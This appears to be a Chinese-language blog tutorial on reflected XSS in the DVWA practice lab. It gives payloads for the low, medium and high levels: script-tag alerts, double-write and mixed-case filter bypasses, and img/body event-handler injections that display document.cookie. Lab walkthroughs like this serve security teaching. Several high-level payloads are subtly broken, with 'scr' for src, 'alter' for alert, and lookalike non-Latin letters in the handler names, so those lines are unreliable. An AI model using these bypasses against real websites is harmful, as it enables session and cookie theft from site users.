【DVWA-master】反射型xss(每一步都很详细)

xss(跨站脚本攻击)是一种常见的Web应用程序安全漏洞‌,它允许攻击者在网页中嵌入恶意脚本代码,通常是JavaScript,当用户浏览这些网页时,嵌入的代码会在用户的浏览器上执行,从而达到攻击者的目的‌.

一,反射型xss(初级)

在DVWA-master里面点击xss(reflect)

1.执行<script>alert(/xss/)</script>会出现弹框,有xss漏洞

2.查看当前的cookie

<script>alert(document.cookie)</script>

二,反射型xss(中级)

切换到安全级别中级,查看源代码,会发现会直接过滤掉<script>,所以要想办法绕过它,可以用双写绕过或者是大小写混淆绕过

1.双写绕过

(1)<sc<script>ript>alert(/xss/)</script>   执行出现谈话框

(2)获取当前页面cookie

<sc<script>ript>alert(document.cookie)</script>

2.大小写混淆绕过

(1)<ScriPt>alert(/xss/)</script>

(2)获取当前页面cookie

<ScriPt>alert(document.cookie)</script>

,反射型xss(高级)

查看源程序发现对<script>进行了替换,不能用常规的方法绕过它,可以用其他语句如img标签和body标签

1.使用标签img

(1)<img scr=1 οnerrοr=alter(/xss/)>  

(2)查看当前的cookie

<img src=1 οnerrοr=alert(document.cookie)>

2.用body标签

(1)<body οnlοad=alert(/xss/)>

(2)查看当前的cookie

<body οnlοad=alert(document.cookie)>

中高级主要是想办法去绕过

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值